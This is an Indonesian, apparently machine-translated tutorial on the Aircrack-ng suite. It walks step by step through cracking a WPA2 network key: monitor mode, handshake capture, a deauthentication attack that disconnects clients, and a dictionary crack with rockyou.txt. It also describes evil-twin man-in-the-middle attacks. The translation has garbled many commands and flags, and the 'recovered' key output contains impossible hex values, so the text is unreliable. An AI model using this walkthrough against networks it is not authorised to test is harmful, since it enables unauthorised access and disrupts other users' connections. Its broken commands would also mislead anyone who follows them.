Cara Menggunakan Aircrack-ng

How Use Aircrack Ng

Sebagian besar waktu, orang tidak pernah memikirkan jaringan tempat mereka terhubung. Mereka tidak pernah berpikir seberapa aman jaringan itu dan seberapa besar mereka mempertaruhkan data rahasia mereka setiap hari. Anda dapat menjalankan pemeriksaan kerentanan di jaringan wifi Anda dengan menggunakan alat yang sangat kuat yang disebut Aircrack-ng dan Wireshark. Wireshark digunakan untuk memonitor aktivitas jaringan. Aircrack-ng lebih seperti alat agresif yang memungkinkan Anda meretas dan memberikan akses ke koneksi Nirkabel. Berpikir sebagai penyusup selalu menjadi cara teraman untuk melindungi diri Anda dari peretasan. Anda mungkin dapat memahami tindakan tepat yang akan dilakukan penyusup untuk mendapatkan akses ke sistem Anda dengan mempelajari tentang aircrack. Anda kemudian dapat melakukan pemeriksaan kepatuhan pada sistem Anda sendiri untuk memastikan bahwa itu tidak tidak aman.

Aircrack-ng adalah satu set lengkap perangkat lunak yang dirancang untuk menguji keamanan jaringan WiFi. Ini bukan hanya alat tunggal tetapi kumpulan alat, yang masing-masing melakukan tujuan tertentu. Berbagai area keamanan wifi dapat dikerjakan, seperti memantau Access Point, menguji, menyerang jaringan, meretas jaringan wifi, dan mengujinya. Tujuan utama Aircrack adalah untuk mencegat paket dan menguraikan hash untuk memecahkan kata sandi. Ini mendukung hampir semua antarmuka nirkabel baru. Aircrack-ng adalah versi perbaikan dari suite alat Aircrack yang sudah ketinggalan zaman, ng mengacu pada Generasi baru . Beberapa alat luar biasa yang bekerja sama dalam menyelesaikan tugas yang lebih besar.



Airmon:

Airmon-ng disertakan dalam kit aircrack-ng yang menempatkan kartu antarmuka jaringan dalam mode monitor. Kartu jaringan biasanya hanya akan menerima paket yang ditargetkan untuk mereka seperti yang ditentukan oleh alamat MAC NIC, tetapi dengan airmon-ng, semua paket nirkabel, baik yang ditargetkan untuk mereka atau tidak, akan diterima juga. Anda harus dapat menangkap paket-paket ini tanpa menghubungkan atau mengautentikasi dengan titik akses. Ini digunakan untuk memeriksa status Titik Akses dengan menempatkan antarmuka jaringan dalam mode monitor. Pertama, kita harus mengonfigurasi kartu nirkabel untuk mengaktifkan mode monitor, kemudian mematikan semua proses latar belakang jika menurut Anda ada proses yang mengganggunya. Setelah menghentikan proses, mode monitor dapat diaktifkan pada antarmuka nirkabel dengan menjalankan perintah di bawah ini:



[dilindungi email] :~$sudoairmon-ng mulai wlan0#

Anda juga dapat menonaktifkan mode monitor dengan menghentikan airmon-ng kapan saja dengan menggunakan perintah di bawah ini:

[dilindungi email] :~$sudoairmon-ng berhenti wlan0#

airodump:

Airodump-ng digunakan untuk membuat daftar semua jaringan di sekitar kita dan untuk melihat informasi berharga tentang mereka. Fungsi dasar airodump-ng adalah untuk mengendus paket, jadi pada dasarnya diprogram untuk mengambil semua paket di sekitar kita saat berada dalam mode monitor. Kami akan menjalankannya terhadap semua koneksi di sekitar kami dan mengumpulkan data seperti jumlah klien yang terhubung ke jaringan, alamat mac mereka yang sesuai, gaya enkripsi, dan nama saluran dan kemudian mulai menargetkan jaringan target kami.

Dengan mengetikkan perintah airodump-ng dan memberinya nama antarmuka jaringan sebagai parameter, kita dapat mengaktifkan alat ini. Ini akan mencantumkan semua titik akses, jumlah paket data, metode enkripsi dan otentikasi yang digunakan, dan nama jaringan (ESSID). Dari sudut pandang peretasan, alamat mac adalah bidang yang paling penting.

[dilindungi email] :~$sudoairodump-ng wlx0mon

retakan udara:

Aircrack digunakan untuk cracking password. Setelah menangkap semua paket menggunakan airodump, kita dapat memecahkan kuncinya dengan aircrack. Itu retak kunci ini menggunakan dua metode PTW dan FMS. Pendekatan PTW dilakukan dalam dua tahap. Pada awalnya, hanya paket ARP yang digunakan, dan hanya kemudian, jika kunci tidak di-crack setelah pencarian, ia menggunakan semua paket yang ditangkap lainnya. Poin plus dari pendekatan PTW adalah tidak semua paket digunakan untuk cracking. Dalam pendekatan kedua, yaitu, FMS, kami menggunakan model statistik dan algo brute force untuk memecahkan kunci. Metode kamus juga dapat digunakan.

Putar ulang:

Airplay-ng memperkenalkan paket ke jaringan nirkabel untuk membuat atau mempercepat lalu lintas. Paket dari dua sumber berbeda dapat ditangkap oleh aireplay-ng. Yang pertama adalah jaringan langsung, dan yang kedua adalah paket dari file pcap yang sudah ada. Airplay-ng berguna selama serangan deauthentication yang menargetkan titik akses nirkabel dan pengguna. Selain itu, Anda dapat melakukan beberapa serangan seperti serangan kopi latte dengan airplay-ng, alat yang memungkinkan Anda mendapatkan kunci dari sistem klien. Anda dapat mencapai ini dengan menangkap paket ARP dan kemudian memanipulasinya dan mengirimkannya kembali ke sistem. Klien kemudian akan membuat paket yang dapat ditangkap oleh airodump dan aircrack memecahkan kunci dari paket yang dimodifikasi tersebut. Beberapa opsi serangan lain dari airplay-ng termasuk chopchop, fragmen arepreplay, dll.

Pangkalan Udara:

Airbase-ng digunakan untuk mengubah komputer penyusup ke titik koneksi yang disusupi untuk ditautkan oleh orang lain. Menggunakan Airbase-ng, Anda dapat mengklaim sebagai titik akses legal dan melakukan serangan man-in-the-middle pada komputer yang terhubung ke jaringan Anda. Jenis serangan ini disebut Evil Twin Attacks. Tidak mungkin bagi pengguna dasar untuk membedakan antara jalur akses legal dan jalur akses palsu. Jadi, ancaman kembar jahat adalah salah satu ancaman nirkabel paling mengancam yang kita hadapi saat ini.

Airolib-ng:

Airolib mempercepat proses peretasan dengan menyimpan dan mengelola daftar kata sandi dan titik akses. Sistem manajemen basis data yang digunakan oleh program ini adalah SQLite3, yang sebagian besar tersedia di semua platform. Pembobolan kata sandi mencakup penghitungan kunci master berpasangan yang melaluinya kunci transien pribadi (PTK) diekstraksi. Menggunakan PTK, Anda dapat menentukan kode identifikasi pesan bingkai (MIC) untuk paket tertentu dan secara teoritis menemukan MIC serupa dengan paket, jadi jika PTK benar, PMK juga benar.

Untuk melihat daftar kata sandi dan mengakses jaringan yang disimpan dalam database, ketik perintah berikut:

[dilindungi email] :~$sudoairolib-ng testdatabase –statistik

Di sini testdatabase adalah db yang ingin Anda akses atau buat, dan –stats adalah operasi yang ingin Anda lakukan padanya. Anda dapat melakukan beberapa operasi pada bidang database, seperti memberikan prioritas maksimum untuk beberapa SSID atau sesuatu. Untuk menggunakan airolib-ng dengan aircrack-ng, masukkan perintah berikut:

[dilindungi email] :~$sudoaircrack-ng-Rtestdatabase wpa2.eapol.cap

Di sini kami menggunakan PMK yang sudah dihitung yang disimpan di basis data uji untuk mempercepat proses cracking password.

Cracking WPA/WPA2 menggunakan Aircrack-ng:

Mari kita lihat contoh kecil tentang apa yang dapat dilakukan aircrack-ng dengan bantuan beberapa alatnya yang luar biasa. Kami akan memecahkan kunci pra-berbagi jaringan WPA/WPA2 menggunakan metode kamus.

Hal pertama yang perlu kita lakukan adalah membuat daftar antarmuka jaringan yang mendukung mode monitor. Ini dapat dilakukan dengan menggunakan perintah berikut:

[dilindungi email] :~$sudoairmon-ng

Chipset Driver Antarmuka PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Kita bisa melihat sebuah antarmuka; sekarang, kita harus meletakkan antarmuka jaringan yang kita temukan ( wlx0 ) dalam mode monitor menggunakan perintah berikut:

[dilindungi email] :~$sudoairmon-ng mulai wlx0

Ini telah mengaktifkan mode monitor pada antarmuka yang disebut wlx0mon .

Sekarang kita harus mulai mendengarkan siaran oleh router terdekat melalui antarmuka jaringan yang telah kita masukkan ke mode monitor.

[dilindungi email] :~$sudoairodump-ng wlx0mon

CH5 ][Berlalu:30S][ 2020-12-02 00:17



Beacon BSSID PWR#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Empat. Lima 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:84:76:10:MENJADI-63 77 0 0 654e. WPA2 CCMP PSK HAckme

C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: MEMBERI:88:FA:38: 02-68 28 2 0 sebelas54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C:3A:Empat. Lima: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF-35 0-1 0 6

E4: 6F:13: 04: CE:31SM:91:B5:F8:7E:D5 -390e-1 1002 13

Jaringan target kami adalah Crackit dalam hal ini, yang sedang berjalan di saluran 1.

Di sini untuk memecahkan kata sandi jaringan target, kita perlu menangkap jabat tangan 4 arah, yang terjadi ketika perangkat mencoba terhubung ke jaringan. Kita dapat menangkapnya dengan menggunakan perintah berikut:

[dilindungi email] :~$sudoairodump-ng-C 1--bssid E4: 6F:13: 04: CE:31 -di dalam /rumah wlx0

-C : Saluran

–Bss : Bssid dari jaringan target

-di dalam : Nama direktori tempat file pcap akan ditempatkan

Sekarang kita harus menunggu perangkat terhubung ke jaringan, tetapi ada cara yang lebih baik untuk menangkap jabat tangan. Kami dapat melakukan deauthentication perangkat ke AP menggunakan serangan deauthentication menggunakan perintah berikut:

[dilindungi email] :~$sudoairplay-ng-0 -keE4: 6F:13: 04: CE:31

ke : Bssid dari jaringan target

-0 : serangan deautentikasi

Kami telah memutuskan semua perangkat, dan sekarang kami harus menunggu perangkat terhubung ke jaringan.

CH1 ][Berlalu:30S][ 2020-12-02 00:02][Jabat tangan WPA: E4: 6F:13: 04: CE:31



Beacon BSSID PWR RXQ#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 1WPA2 CCMP PSK P ke 54



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31SM:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C:3A:Empat. Lima: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF-37 0- 1e0 1

Kami mendapat pukulan, dan dengan melihat sudut kanan atas tepat di sebelah waktu, kami dapat melihat jabat tangan telah ditangkap. Sekarang lihat di folder yang ditentukan ( /rumah dalam kasus kami ) untuk a .pcap mengajukan.

Untuk memecahkan kunci WPA, kita dapat menggunakan perintah berikut:

[dilindungi email] :~$sudoaircrack-ng-a2 -di dalamrockyou.txt-BE4: 6F:13: 04: CE:31jabat tangan.cap

b :Bssid dari jaringan target

-a2: mode WPA2

Rockyou.txt: Kamusmengajukandigunakan

Handshake.cap: Themengajukan yangberisi jabat tangan yang ditangkap

Aircrack-ng1.2beta3

[00:01:49] 10566kunci diuji(1017,96ke/S)

KUNCI DITEMUKAN! [saya ketahuan]

Kunci Utama : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED SM 6B H7 J8 K1 A0896B 7B B F7 6Flima puluhC


Kunci Sementara : 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6Flima puluhC025 62E9 5D71

Kunci jaringan target kami telah berhasil dipecahkan.

Kesimpulan:

Jaringan nirkabel ada di mana-mana, digunakan oleh setiap perusahaan, mulai dari pekerja yang menggunakan smartphone hingga perangkat kontrol industri. Menurut penelitian, hampir lebih dari 50 persen lalu lintas internet akan melalui WiFi pada tahun 2021. Jaringan nirkabel memiliki banyak keunggulan, komunikasi di luar pintu, akses internet cepat di tempat-tempat yang hampir tidak mungkin untuk memasang kabel, dapat memperluas jaringan tanpa memasang kabel untuk pengguna lain, dan dapat dengan mudah menghubungkan perangkat seluler Anda ke kantor di rumah saat Anda tidak berada di sana.

Terlepas dari kelebihan ini, ada tanda tanya besar tentang privasi dan keamanan Anda. Sebagai jaringan ini; dalam jangkauan transmisi router terbuka untuk semua orang, mereka dapat dengan mudah diserang, dan data Anda dapat dengan mudah dikompromikan. Misalnya, jika Anda terhubung ke beberapa wifi publik, siapa pun yang terhubung ke jaringan itu dapat dengan mudah memeriksa lalu lintas jaringan Anda menggunakan beberapa kecerdasan dan dengan bantuan alat luar biasa yang tersedia dan bahkan membuangnya.